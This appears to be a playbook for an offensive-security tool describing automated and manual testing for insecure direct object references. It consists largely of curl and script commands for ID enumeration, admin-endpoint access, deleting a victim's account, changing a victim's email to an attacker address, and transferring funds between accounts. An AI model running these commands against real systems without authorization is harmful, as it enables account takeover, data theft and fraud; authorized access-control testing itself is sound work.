| name | attack-idor-automation |
| description | IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["idor","bac","access-control","web","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-639","CWE-284"] |
| chains_with | ["attack-jwt","attack-graphql"] |
| prerequisites | [] |
| severity_boost | {"attack-jwt":"JWT tamper + IDOR = full account takeover"} |
IDOR Automated Testing
Objective
Systematically test all API endpoints for Insecure Direct Object Reference vulnerabilities using two accounts with different privilege levels.
Testing Methodology
Phase 1: Set Up Two Accounts
- Account A (victim) — owns resources being tested
- Account B (attacker) — tries to access Account A's resources
Phase 2: Automated Cross-Account Testing
attack_script idor_tester \
--token-a "VICTIM_JWT" \
--token-b "ATTACKER_JWT" \
--endpoints endpoints.txt \
--json-output
attack_script idor_tester \
--token-a "VICTIM_JWT" \
--token-b "ATTACKER_JWT" \
--endpoints "https://TARGET/api/users/123,https://TARGET/api/orders/456,https://TARGET/api/profile/123" \
--method GET
attack_script idor_tester \
--token-a "VICTIM_JWT" \
--token-b "ATTACKER_JWT" \
--endpoints endpoints.txt \
--method PUT \
--data '{"name":"pwned"}'
Phase 3: Manual Testing Patterns
Horizontal IDOR (same role, different user):
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/1
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/2
curl -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/UUID_OF_OTHER_USER
for id in $(seq 1 100); do
curl -s -o /dev/null -w "%{http_code} " -H "Authorization: Bearer ATTACKER_TOKEN" "https://TARGET/api/orders/$id"
done
Vertical IDOR (low-priv accessing high-priv):
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/users
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/admin/settings
curl -H "Authorization: Bearer USER_TOKEN" https://TARGET/api/internal/reports
Phase 4: HTTP Method Switching
curl -X DELETE -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID
curl -X PATCH -H "Authorization: Bearer ATTACKER_TOKEN" https://TARGET/api/users/VICTIM_ID \
-d '{"email":"attacker@evil.com"}'
Phase 5: Parameter Pollution
curl "https://TARGET/api/profile?user_id=ATTACKER&user_id=VICTIM"
curl -X POST https://TARGET/api/transfer \
-H "Authorization: Bearer ATTACKER_TOKEN" \
-d '{"from":"VICTIM_ID","to":"ATTACKER_ID","amount":1000}'
Phase 6: Response Comparison
attack_script response_diff "https://TARGET/api/users/VICTIM_ID" \
--header-a "Authorization:Bearer VICTIM_TOKEN" \
--header-b "Authorization:Bearer ATTACKER_TOKEN" \
--json-output
What Constitutes a Finding
| Finding | Severity |
|---|
| Read other user's PII (email, SSN, etc.) | Critical (P1) |
| Modify other user's data | Critical (P1) |
| Delete other user's resources | Critical (P1) |
| Access admin functionality | Critical (P1) |
| Read non-sensitive data of other user | Medium (P3) |
Evidence Requirements
- Two different auth tokens used
- Endpoint tested
- Account A (victim) response as baseline
- Account B (attacker) accessing Account A's resource
- Data received proving cross-account access
Tools
attack_script idor_tester — automated cross-account testing
attack_script response_diff — response comparison
attack_script jwt_tamper — token manipulation for IDOR
References